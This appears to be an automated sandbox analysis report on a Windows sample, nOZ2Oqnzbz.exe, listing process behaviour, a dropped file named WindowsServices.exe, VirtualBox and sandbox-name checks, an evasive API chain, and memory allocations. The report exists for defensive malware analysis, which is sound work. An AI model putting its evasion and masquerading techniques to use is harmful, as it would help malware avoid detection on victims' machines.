Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Code function: VBoxS VBoxS

0_2_00405A10

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_0-1772

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	File opened: C:\myapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File opened: C:\myapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File opened: C:\myapp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	File opened: C:\myapp.exe

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Memory allocated: 2B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Memory allocated: 4B70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 2B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 4B80000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 67C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 77C0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 8A20000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 8CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 9CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 9CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: ACD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: BCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 8080000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: CCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: DCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: ECD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: FCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 10CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 8860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 9860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: A860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: A820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 11CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 12CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 13CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 14CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: A960000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 15CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 16CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 17CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 18CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 19CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1ACD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1BCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1CCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1DCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1ECD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 1FCD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 20CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 21CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 22CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 23CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 24CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 25CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 26CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 27CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 28CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 29CD0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: D9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: E9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Memory allocated: 13DD0000 memory reserve \| memory write watch	Jump to behavior
